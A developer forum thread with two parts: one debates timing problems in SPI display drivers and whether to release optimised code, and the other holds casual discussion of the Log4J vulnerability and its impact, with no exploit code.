|
The problem with that is simply effort. Basically I'd need to know the timings for absolutely everything. It would take me months to write code that should take me days. I think I'll pass.
Real programmers use butterflies
|
|
|
|
|
That is overly pessimistic. Systems get designed without knowing "everything". What you do need is a basic approach to the setup-and-hold issue; so you need to make sure
A) data transfers don't overlap
B) each data transfer consists of three phases:
1. set the data ready
2. issue the clock/latch pulse
3. remove the data (i.e. guarantee the hold spec)
These steps must remain in sequence, with non-zero time between them. As electronic setup and hold requirements range in the (tens of) nanoseconds, having one or a few instructions in between normally suffices. How you get that depends on environment and available tooling.
If a general purpose driver is present, consider using three separate I/O operations. If a specialized driver is used, it should take care of the details itself.
Once you get a solution, use it everywhere. Separation of concerns applies at all levels.
PS: Beware of optimizing compilers; low-level code best is collected in a separate file that gets handled with other tools or tool settings.
Luc Pattyn [My Articles]
The Windows 11 "taskbar" is disgusting. It should be at the left of the screen, with real icons, with text, progress, etc. They downgraded my developer PC to a bloody iPhone.
|
|
|
|
|
This is all an excellent argument for using my logic analyzer.
Real programmers use butterflies
|
|
|
|
|
That does not make any sense to me; it sounds like using a debugger when code does not even compile.
BTW: a logic analyzer also has setup and hold requirements!
Luc Pattyn [My Articles]
The Windows 11 "taskbar" is disgusting. It should be at the left of the screen, with real icons, with text, progress, etc. They downgraded my developer PC to a bloody iPhone.
|
|
|
|
|
Okay.
I don't time the SPI in software. It is timed by a controller on the MCU I'm using.
No compiler in the world is going to tell me what that hardware is producing.
A logic analyzer will.
So if I want to make sure the signals don't overlap, I'm looking at the bus output using my salae. Full stop.
Real programmers use butterflies
|
|
|
|
|
Displays have their own requirements, no matter what bus or interface is being used. Their functionality typically is microcontroller based, and simple commands take a few microseconds to process; more complex commands (total reset, return home, row clear, ...) may run into a few milliseconds. Obviously you have to take care of that, SPI or any other interface won't do it for you.
If you want to debug that with an LA, be my guest. My first approach would be to add some code to either check things by software (assert minimum timespan between commands) or generate a log file; yes I'm aware this by itself may change the timing a bit, however it can tell me where things are insufficient or marginal.
Luc Pattyn [My Articles]
The Windows 11 "taskbar" is disgusting. It should be at the left of the screen, with real icons, with text, progress, etc. They downgraded my developer PC to a bloody iPhone.
|
|
|
|
|
Luc Pattyn wrote: My first approach would be to add some code to either check things by software (assert minimum timespan between commands)
And which display model and chip should I start with since the same exact thing (including exactly how it fails) happens on literally all of them. ST7789, ILI9341, and SSD1351 alike.
So which datasheet do I start with? Since they all fail exactly the same way?
Real programmers use butterflies
|
|
|
|
|
If you want all of them to work properly, it does not really matter, you would have to solve all problems anyway. But then ST7789S and ILI9341 look very similar, while SSD1351 is clearly different.
Assuming nothing else is a factor (e.g. all hardware looks equally reliable) I would start with ST7789S or ILI9341, whichever you get the most recent datasheet for. Or the most intelligible one, as not all Asian-to-English translations are equally successful.
Luc Pattyn [My Articles]
The Windows 11 "taskbar" is disgusting. It should be at the left of the screen, with real icons, with text, progress, etc. They downgraded my developer PC to a bloody iPhone.
|
|
|
|
|
Since you're asking for opinion: You seem to be a very creative person, so I'm guessing that you have ideas bubbling away on the back burner of your mind all the time. Back burner this one. Let it rest from up-front work while you work on other projects, and the answer might just hit you along the way.
|
|
|
|
|
1. Optimised code that does not work is not optimised code.. it's broken code.
2. Get on and fix it - use a good LA to look at timing and data value differences on the bus of when it works/compared to not working.
3. Do not release known broken code.
4. Consider people asking to use DMA....
|
|
|
|
|
I don't like it when people are pedantic. You know what I mean in #1.
The DMA is actually the only part that's working consistently.
Real programmers use butterflies
|
|
|
|
|
Yes I do know what you mean. But the point is consumers of your library will not know (or really care?) about the history of the code, they just want to use code that works and is good quality. If perhaps you change the wording and asked if consumers would like un-optimised code or broken code, neither sound all that appealing.
|
|
|
|
|
As I said in my OP though maybe I wasn't clear, I wouldn't be releasing code that didn't work. I'd simply dial back the optimizations until they weren't there anymore, leaving it functioning the same way the existing released code is (at least for SPI)
I should add, I've already decided not to release it, so this exchange is moot, outside simply the hypothetical. Just FYI.
Real programmers use butterflies
|
|
|
|
|
I see
|
|
|
|
|
it's been a couple years since I last wrote a SPI -> display setup, but if I'm remembering correct there is a minimum time threshold for the slave device to register the tick.
Usually the pdf for the display chip should have the min and max values. But I'm likely saying something you already know.
have you tried putting in some empty wait commands between processing to slow it down a few cycles and see if the displays not working correctly start working again? if they do, can you make a make a couple variables when initializing the code like: _DSP_FAST =0, _DSP_MED = 16, _DSP_SLOW = 32 and tie those into wait loops?
whether to release it or not question: I wouldn't unless there is a clear advantage for your optimized code like a solid 10% gain (or more) in clock ticks that can be shed over to other processing tasks, but then you should have a disclaimer for what displays work good, and what ones you know don't.
gosh I miss working on that stuff.
good luck on what ever direction you are going.
|
|
|
|
|
Does anyone actually use Log4J ? I means its like 1999...stuff ? ... I thought there were other diagnotsic api and services... the so called article writers who get paid to write doom to pay their rent...say that "The Log4J Vulnerability Will Haunt the Internet for Years"...........Its like replace "The covid pandemic Will Haunt the world for Years'......damn...
Caveat Emptor.
"Progress doesn't come from early risers – progress is made by lazy men looking for easier ways to do things." Lazarus Long
|
|
|
|
|
When I heard about it a bit over a week ago, I scanned all my file systems. The only bits that came close were some historical backups of long-dead machines.
The first attempted exploit in my server logs was at 2021-12-11 00:28Z.
Since then the "villains" are using all sorts of cute encoding tricks to get jndi past dumb filters that look for it in plain text.
They account for currently around 7 or 8% of the noise traffic (i.e. by IP address, not hostname).
And yes, I think there is a considerable "beatup" component. Apart from Minecraft, I haven't heard of any significant exploits.
Software rusts. Simon Stephenson, ca 1994. So does this signature. me, 2012
|
|
|
|
|
|
Did a scan on my machine. IntelliJ Idea uses it.
|
|
|
|
|
Where I work (Windows shop) we only have two candidates, TeamCity and Jira, both were not affected.
|
|
|
|
|
Well plenty of 1999 stuff is still running in production in plenty of places.. why changes something that is working hey?!
AS400 and Cobol is much older and still widely in use!
modified 18-Dec-21 5:13am.
|
|
|
|
|
I have a Linux Jenkins build server and whilst the Jenkins core doesn't use log4j the groovy scripting language does and possibly some plugins.
"Life should not be a journey to the grave with the intention of arriving safely in a pretty and well-preserved body, but rather to skid in broadside in a cloud of smoke, thoroughly used up, totally worn out, and loudly proclaiming “Wow! What a Ride!" - Hunter S Thompson - RIP
|
|
|
|
|
Another reason not to blindly jump on any "new" framework, just because it's "new".
BTW, my team is full of programming gods, and we don't do logging. At all.
".45 ACP - because shooting twice is just silly" - JSOP, 2010 ----- You can never have too much ammo - unless you're swimming, or on fire. - JSOP, 2010 ----- When you pry the gun from my cold dead hands, be careful - the barrel will be very hot. - JSOP, 2013
|
|
|
|
|
Programming gods wouldn't use a third-party logging library anyway; if needed, they'd roll their own.
|
|
|
|
|
I don't understand it...
A logging library should simply log messages, right?
How can a logging library become vulnerable? I think only if it does taking actions for specific messages. And that is not the job of a logging tool
[Edit]
Good explanation I found here: All About Log4j Log4Shell 0-Day Vulnerability - CVE-2021-44228[^]
modified 18-Dec-21 7:02am.
|
|
|
|